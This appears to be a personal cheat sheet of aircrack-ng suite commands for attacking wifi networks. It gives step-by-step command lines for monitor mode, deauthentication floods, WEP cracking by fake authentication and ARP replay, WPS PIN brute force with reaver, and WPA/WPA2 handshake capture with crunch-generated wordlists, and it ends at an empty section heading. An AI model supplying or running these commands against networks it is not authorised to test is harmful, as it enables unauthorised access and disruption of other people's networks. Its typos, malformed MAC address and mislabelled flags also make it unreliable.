*****************************************
*					*
*					*   // anything inside < > , should be ignore
*             W I F I			*
*					*
*					*
*****************************************


ifconfig---> to see all network adaptors 

airmon-ng start wlan0 ----> start wlan0(wifi adaptor) in monitor mode

airodump-ng wlan0----> start capturing packets


airodump-ng --bssid 00:5F:67:75:32:21 --channel 2 --write test wlan0  ---> gather more detailed information from a wifi network 

aireplay-ng --deauth 100000000 -a FA:50:75:2F:4E:BC -c 58:1C:F8:4D:7B:F5 wlan0 ---> deauthorize a device from a wifi AP { -a : traget device  -c : wifi sourcce}





-------------------------------------------------------------------------------------------------------------------------------------------------------------------

Breaking Encryption 
- - - - - - - - - - - - 

(1) WEP Encryption 
    ------------------
    WEP connections use a 24 digit connection string + key+ password , so we can analyze the packets to figure out the key.    ----- ivs
    
    
    step 1 : airodump-ng start wlan0  = to get all bssid
    
    (if the network is not a busy network packet generation can take forever , use below step as work around)
    
    step 2 : airpelay-ng --fakeauth 0<number of time> -a 54:67:32:22:11 <router bssid> -h 34:23:22:22:10 <network card mac id> wlan0
    
    (this will associate you to the network)
    
    step 3: aireplay-ng --arpreply -b 54:67:32:22:11 <router bssid> -h 34:23:22:22:10 <network card mac id> wlan0
     
    (capture arp packet , and keeps on retransmitting it)
    
    step 4 : airodump-ng --bssid 00:5F:67:75:32:21 --channel 2 --write test wlan0 
    
    step 5 : aircrack-ng test-01.cap 
    
    (used to crack pasword)


(2)WPS Encryption
  ------------------
  
  Many routers comes with this feature that allows you to enter 8 digit pin to connect to the it, if you can guess the 8 digit pin ,its pretty simple to crack password
  
  step 1 : wash --interface wlan0
   {this list down all wifi network , if (column) Lck--->NO ,means the router has this option enable}
 
 step 2 : aireplay-ng --fakeauth 0<number of time> -a 54:67:32:22:11 <router bssid> -h 34:23:22:22:10 <network card mac id> wlan0
    
    (this will associate you to the network)
   
 ** To get mac of networkcard use ifconfig and look for below 
    unspec 60-31-3B-06-B4-72-00-1F-00-00-00-00-00-00-00-00 ------>copy the first 12 numbers and separate it with " : " 
    
    aireplay-ng --fakeauth 10 -a 00:5F:67:75:32:21 -h 60:31:3B:06:B4:72 wlan0   -----> value "10" says try reconnecting after every 10 sec
    
    

 step 3: reaver --bssid 00:5F:67:75:32:21 --channel 2 --interface wlan0 -vvv --no-associate


         (this will use brute force to get the wps pin)
         
         (Note : run step 2 and 3 simultaneously)
 
 
 If this step runs for ever then , its correct to assume , your target is configured to use push button



(3) WPA/WPA2 Encryption
   --------------------------
   
   step 1 : airodump-ng wlan0 
          
          (get all info of target )
          
   step 2 : airodum-ng --bssid <give id > --channel 2<check in above step> --write <file name> wlan0
   
   if you see delay in capturing handshake , they you can try deauth attack
   
   
   we need a word list to crack password
   
   step 3 : crunch <minimum length> <maximum length> <characters to include> -o <output file name> -t <you can prefill places like sa@@@>
   
   //this will guess only for places marked by '@'
   
   step 4 : aircrack-ng <file_name.cap> -w <word_list>
   
   
   
   
  
  
  Discover Others On same Network
  -------------------------------
  
  
  ** Make sure you are connected to the network that you monitor ***
  
  
   
   
   









